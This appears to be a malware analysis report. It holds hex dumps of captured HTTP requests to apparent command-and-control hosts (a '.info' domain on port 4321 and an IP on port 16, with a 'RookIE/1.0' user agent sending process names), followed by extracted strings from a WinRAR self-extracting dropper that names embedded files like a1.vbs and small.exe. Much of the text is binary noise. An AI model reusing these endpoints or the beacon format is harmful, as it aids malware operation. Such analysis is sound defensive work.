0x00000150 (00336)   3131312e 6578653b 72756e64 6c6c3332   111.exe;rundll32
0x00000160 (00352)   2e657865 3b616430 30352e65 78653b63   .exe;ad005.exe;c
0x00000170 (00368)   6d642e65 78653b72 756e646c 6c33322e   md.exe;rundll32.
0x00000180 (00384)   6578653b 776d6970 72767365 2e657865   exe;wmiprvse.exe
0x00000190 (00400)   3b777363 72697074 2e657865 3b616c68   ;wscript.exe;alh
0x000001a0 (00416)   2e657865 3b636d64 2e657865 3b72756e   .exe;cmd.exe;run
0x000001b0 (00432)   646c6c33 322e6578 653b2048 5454502f   dll32.exe; HTTP/
0x000001c0 (00448)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x000001d0 (00464)   20526f6f 6b49452f 312e300d 0a486f73    RookIE/1.0..Hos
0x000001e0 (00480)   743a2031 32312e31 322e3130 342e3236   t: 121.12.104.26
0x000001f0 (00496)   3a31360d 0a0d0a                       :16....

0x00000000 (00000)   47455420 2f736d73 2f787878 342e696e   GET /sms/xxx4.in
0x00000010 (00016)   69204854 54502f31 2e310d0a 41636365   i HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a416363 6570742d   pt: */*..Accept-
0x00000030 (00048)   456e636f 64696e67 3a20677a 69702c20   Encoding: gzip, 
0x00000040 (00064)   6465666c 6174650d 0a557365 722d4167   deflate..User-Ag
0x00000050 (00080)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000060 (00096)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000070 (00112)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000080 (00128)   4e542035 2e313b20 5356313b 202e4e45   NT 5.1; SV1; .NE
0x00000090 (00144)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000a0 (00160)   0d0a486f 73743a20 322e3736 35333231   ..Host: 2.765321
0x000000b0 (00176)   2e696e66 6f3a3433 32310d0a 436f6e6e   .info:4321..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a313b 20535631 3b202e4e   ve....1; SV1; .N
0x000000e0 (00224)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000f0 (00240)   290d0a48 6f73743a 20322e37 36353332   )..Host: 2.76532
0x00000100 (00256)   312e696e 666f3a34 3332310d 0a436f6e   1.info:4321..Con
0x00000110 (00272)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000120 (00288)   6976650d 0a0d0a6e 642e3c2f 703e0a20   ive....nd.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
(&A)
about:blank
ASKNEXTVOL
</b> 
 <b>
(&B)...
<br><br> <lI>
b<style>body{font-family:"Arial,
(&C)
(&D)
(&E):
";font-size:12;}</style><ul><li>
GETPASSWORD1
hmsctls_progress32
(&L)
</lI>
</li><br><br>)<li>
LICENSEDLG	RENAMEDLG
</lI></ul>
(&N)
(&R)
REPLACEFILEDLG
 %s 
"%s"
 %s CRC 
%s CRC 
Shell.Explorer
STARTDLG
(&W)...
 Windows 
WinRAR 
(&Y)
?*<>|"
08_e|F
 (08@P`p
0AGhi&
{0*{*bG
0H V1v
0JC*CJb
0J?`W)
0oZi^t
0y-]t|
106.exe
1111.exe
$17FPP8
.1DnZs
1gbAvB
1Pxych[64
1p'z!X
1~:Y34
2[Cy>P
2E!6h"
>	2qO O
&31/@m
_32Bpr
33!D	3
3k<_G#
3qDyQ{
(3sW2[
$4L"tc
4Y_cOW
4Y_cOW	
!4yiWO
4]yupko
5'@~ +
5 5bw\
5B%z^{
{.5<i 
5z)Pcb
{6RqAC
6vx=_^
]7a?tt
7VdmG9-
=7.Yxh
80zo<'l2
:8@am+
"=8}F|/
(8L.v|vJ
8r22b@
8$RlXk5
8]st!hx$A
8;vo]`
=94l|;0
9}b9K[vD}
9j\o|e
9#N"lM
~9O+T&
9}rv]Qf
"9*W)"9&_#e"
a1.vbs
ad005.exe
AdjustTokenPrivileges
ADVAPI32.dll
%A|--g
AG99$q6
Ag-L*~
.ahKF1
AHOw1+%
  </application>
  <application>
aSaZaba
ASKNEXTVOL
</asmv3:application>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">
  </asmv3:windowsSettings>
  <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
</assembly>
<assemblyIdentity
    <assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
a|~ub%
~@au*u
}^A$wW;
AxTw;z@?v
a	yB3p
B0G0J0T0w
b2.exe
+b^2Yd
`B}+4o
bad allocation
bF&&.Q
BFRbnz
@b	gck(W
=bGE	H
=[b:HaP
 bI:cO
=btq1r
+c{["0
C6j[G;+
c8VuTg=6}
ceQ&^	gdk
c=-f`U
CharToOemA
CharToOemBuffA
CharUpperA
)Ck%W8
CloseHandle
CLSIDFromString
CmNFf=-
CMT	UT
CoCreateInstance
COMCTL32.dll
COMCTL32.DLL
COMDLG32.dll
CommDlgExtendedError
CompareStringA
</compatibility>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
CopyRect
CreateCompatibleBitmap
CreateCompatibleDC
CreateDirectoryA
CreateDirectoryW
CreateFileA
CreateFileW
CreateStreamOnHGlobal
CreateWindowExA
cs)cG]'
CyC|CY
:}C/Zh,
D,7$}H_
@.data
[&d*:c
DDDDDD
DDDDDDDDD@
DDDDDDDDDDDDDD
DDDDDDDDDGpw
DefWindowProcA
Delete
DeleteDC
DeleteFileA
DeleteFileW
DeleteObject
</dependency>
<dependency>
  </dependentAssembly>
  <dependentAssembly>
<description>WinRAR SFX module</description>
DestroyIcon
DestroyWindow
d.fMQXz
D<hF!g
DhSj}%
DialogBoxParamA
DispatchMessageA
DosDateTimeToFileTime
d+"[ph
    <dpiAware>true</dpiAware>
d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb
d#sOn1
D}${U$V
E3$"yG
E6$0ddZ*|
e6)t~Rr08
=E_A.j
e_CBaA
EE3]fz
#?,EE6
;EE+c-
EH(!Bo
)|e(~iG
_+e"^l-
-el -s2 "-d%s" "-p%s" "-sp%s"
EnableWindow
EndDialog
Eo9nPO
=)eoli
E'R;[+Q
Erq<2O
e%{SaU
EvBG.8St
e+vh?E
%E_vS^
EWmmII#
E@XE;v
ExitProcess
ExpandEnvironmentStringsA
;e.y*1 %
|~+E"z=
Ezfc'H
~|f}`_
F2LjgA
%f3B^$
F66@ga
F(7[~2
{F8cfr
fbc:N:
F[cw{]M
fc;X78
FFF))EE	FFFF))))))
F,;F$s7
.)FgA~	Z
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileA
FindFirstFileW
FindNextFileA
FindNextFileW
FindResourceA
FindWindowExA
;]fiub<
F%K%S~PPp)	
*FN!Bx8
^&fnG!qk
FreeLibrary
;F$s6;F
FU/cSzH
fvW{SJ
FW,(y:z
@!G(&+
g33WwQ
g5C,A#
#g5w)w
]G9kaUoe\J
@g;a.c
GDI32.dll
gE2(F `+
,GEdAZ
?`@geS
GetClassNameA
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentDirectoryA
GetCurrentProcess
GetDateFormatA
GetDeviceCaps
GetDlgItem
GetDlgItemTextA
GetFileAttributesA
GetFileAttributesW
GetFileType
GetFullPathNameA
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetNumberFormatA
GetObjectA
GetOpenFileNameA
GetParent
GETPASSWORD1
GetProcAddress
GetProcessHeap
GetSaveFileNameA
GetStdHandle
GetSysColor
GetSystemMetrics
GetSystemTime
GetTempPathA
GetTickCount
GetTimeFormatA
GetVersionExA
GetWindow
GetWindowLongA
GetWindowRect
GetWindowTextA
gkX4Mj
(g>)-L
GlobalAlloc
}g;oG]
Go q37
G`Ulc?
G{W|bU
gwS3	3
gwS37%w`	
gxIGU	
&GZJ$x
$H2	CV
"h9R"%
<head><meta http-equiv="content-type" content="text/html; charset=
HeapAlloc
HeapFree
HeapReAlloc
Hfym.N
/+-H@n-r
hR&Mav
h}]~RU`N
HtEHt7
HtFHt8Ht*Ht
HtgHt=
Ht^Ht:HtQHu'
</html>
<html>
h{Ud+?
$=H\`VB
hvvVs[
HXD@T	
H%+x}t
I=bW-r
IFIHQK
IFR4\VTm
I_HN?54t
]_I/NQ
Install
 io#gfU
IPlE5l
i#pRyhm
$iqjTq
IsDBCSLeadByte
IsWindow
IsWindowVisible
iVnv@ks*
iwVt:EN%
IyP)LqU
iYZY+a
I_ZJ^"
jax$?[u
j;b:{s:
jg}f]?
JJC(c-_
J&l'p{
jNq;)3
[j>S.Xz
jt"Ht'Ht
_$^~Ju
+jUJ(q
JWH>+81u}Z
JXe0FOu
j?xzMU
j Y+L$
jYlG|]
k0@J	|/
( K8@K
=,KA`Uj
_ KCZV
KERNEL32.dll
KK \XS
K=)]O<F
KoZX4sT*@&
Kvr}xl
kv.Zct
K=W6dv[
k~whB*
kXnEk;
/KYKaJ
ky.Te,
$l2O\B
L{4\8-
l5vxLBs|
L8^Da/
L8G96g
      language="*"/>
License
LICENSEDLG
lLC2|kBl
ll~r;2D7
lL?#V\
^-LmD@4
LoadBitmapA
LoadCursorA
LoadIconA
LoadLibraryA
LoadStringA
LocalFileTimeToFileTime
LookupPrivilegeValueA
@Lo&-sj#
)/LPa]
lstrcmpiA
lstrlenA
)"~lu9;
lV%[f,'
-;Lz9/
M5@u`q
Man5q}
MapWindowPoints
m[B&FfDyTp)
mbZ4aB
~M?D	{
MessageBoxA
*messages***
(m"Ghl
mkCIeV
Ml^81U)yz
m/.n@cm
Mn=R.p
M,NUN[N|N
MoveFileA
MoveFileExA
mqIrWz){/#
m?rux{
Mtp/*4x
;|Mu7u-|
MultiByteToWideChar
{m:W>I
&M'w.w
MZrpYc
)n>&4c
N4Y_cOW
n58;@.
n6c-#2
""n6xMP
'	n$%9w
n	aAK  	p.'
NAh"g]
      name="Microsoft.Windows.Common-Controls"
  name="WinRAR SFX"
&nbsp;
nD=xcOT
NGetProcAddress
N!};i,
nJc	VHt
nQ#H2/
nRv\2b
N:s`C)
{=nuA*
)NuBmZmwc
-N<V@%
_Nx;?l
O`1BW{U
$\oA:xqTEO
 OBu*{
,O\cidBo
OemToCharA
OemToCharBuffA
O_}E:.P_
`O/f&Tnx
ole32.dll
OLEAUT32.dll
OleInitialize
OleUninitialize
oMj/RC
OpenProcessToken
oq=*6#
o:QV}Po
OU~p R
Overwrite
&>'OVJM
OXr1D{)
o-Y1ia
p1e"Dtrk
P@3,P#
P*8)qot
P9]pu4
P9]pu6
p9u <:
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
PA<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
{P)A.+Y
:pb.Dt
Pc#@~f
PeekMessageA
penc-N
pIr1*x
pJ%<+uZ
]PN`#Qa
PostMessageA
Presetup
      processorArchitecture="*"
  processorArchitecture="*"
ProgramFilesDir
      publicKeyToken="6595b64144ccf1df"
pV}kl4
~P~:)Y
)(PyEH\
Q7:I"q
*q[b$\
QF*p  
QQSVWh
QyJDp3x
qzie(UK[
r0GXs}
R2{UfJ
]R*8cf
rA"mHp
__rar_
RarHtmlClassName
RarSFX
rD#5VL
`.rdata
RD,~fz
ReadFile
RegCloseKey
RegCreateKeyExA
RegisterClassExA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
RENAMEDLG
REPLACEFILEDLG
      <requestedExecutionLevel level="asInvoker"            
    </requestedPrivileges>
    <requestedPrivileges>
riched20.dll
riched32.dll
RichEdit
rjk|a1
%RL/10qs
RMB2RU
@.rsrc
rtmp%d
S//55??GG
/~s5.Z
s8<"u%
SavePath
`sCC)O
%.*s(%d)%s
%s.%d.tmp
SE8d2' 
  </security>
  <security>
SelectObject
SendDlgItemMessageA
SendMessageA
SeRestorePrivilege
SeSecurityPrivilege
SetCurrentDirectoryA
SetDlgItemTextA
SetEndOfFile
SetEnvironmentVariableA
SetFileAttributesA
SetFileAttributesW
SetFilePointer
SetFileSecurityA
SetFileSecurityW
SetFileTime
SetFocus
SetLastError
SetMenu
SetWindowLongA
SetWindowPos
SetWindowTextA
sfxcmd
sfxname
(*+s^G
s)G*;`O
SHAutoComplete
SHBrowseForFolderA
SHChangeNotify
SHELL32.dll
ShellExecuteExA
SHFileOperationA
SHGetFileInfoA
SHGetMalloc
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHl*Pv
shlwapi.dll
Shortcut
ShowWindow
Silent
;slhrN
s/m#2$G
small.exe
Software\Microsoft\Windows\CurrentVersion
Software\WinRAR SFX
'SPN@%e-?
sqbsf#
%s%s%d
SSh,'A
!Ss*Mv
%s %s %s
SSSh$&A
STARTDLG
STATIC
StretchBlt
St{Rn0{ *
</style>
<style>
<style>body{font-family:"Arial";font-size:12;}</style>
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
(SVWj 
SVWj@3
@SVWjg
SWj<_W3
swWH8,y{S
SystemTimeToFileTime
^\^t^~^
t0h,%A
t0]H:hE\2i
t4SSVW
t>*$9_
t	AA@f
Tb?:1q
< tD<	t@
TDTTTF+
TempMode
t	FAA;t$
T_Fc~$
#tg5cLY
    <!--The ID below indicates application support for Windows 7 -->
    <!--The ID below indicates application support for Windows Vista -->
!This program cannot be run in DOS mode.
t*j\@P
__tmp_rar_sfx_access_check_%u
}t:ql|
[t'QXQ
TranslateMessage
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
t<SSSS
<*t!<?t
TXapo`|
&T!y*N
      type="win32"
  type="win32"/>
%;?U3+
(<\u$8F
u9TF#^Q
u:="cnBs
-ud<!y
uE[X~v
ufh|(A
-U(hG\H
      uiAccess="false"/>
u!,\	m 
uMh<#A
un?M[F
Update
UpdateWindow
USER32.dll
utf-8"></head>
]utP;O2
uZZr'cG-
V1M	o;
v>3Gr2
V3qi-N
	v9(g?g4*D
VB*HEpNl
V|BYmx
~VDLqO
  version="1.0.0.0"
      version="6.0.0.0"
VgyJ;W
vkk;{6
V%+m p
v	N+D$
VN,IEe
?vNj@_+
vP7nA"
vsmizy\g
V&t-!s
 Vu{!|8/w
$=|`W	
"W3pzjwZw0t0zb,Q
w5SSSS
WaitForInputIdle
WaitForSingleObject
W?ej_=
=-/wH4
wHJkyZ'
(.wHUQ`
WideCharToMultiByte
WINRAR.SFX
WJ,qP*
w`{jz]
;W=%K1
W.\'kq
WnWl\T
Wpx&z6
WriteFile
wsprintfA
WSSSSh
wTC!IT"
w]Td^^
(wtLF(n
wvsprintfA
Wwgu"'P
WWknj9
WwR"'P
WwS7'u
wwwwww
wwwwwwwwwwwwww
W}y#O.~Z
;-x5W`
xA<0`o
~xcu('
.Xf7c9X/
xH1334
=xI1OL-
xKf_vH
+Xm mlC-
&xUF	P
_xVsvg7tl
]%XX'#0bd
y92s8V
Yc}[Rqv[
YlR=5?
\:$Y'M
YNANRC
Y<p8U1
"\y>-]r[
yu2!9W >
	]Y&V"
Y"WE|%
yX(40.
yy<P^Q
Z2fQ`InitCommonControlsEx
Z2%PG~pT
*-Z3|g
<z<!A9
ZFX5m=
(ZkN17
z_<>`L
Z;Rf'C
z	s]|!'
zx*8g<Cn
^(+z)y#RFR4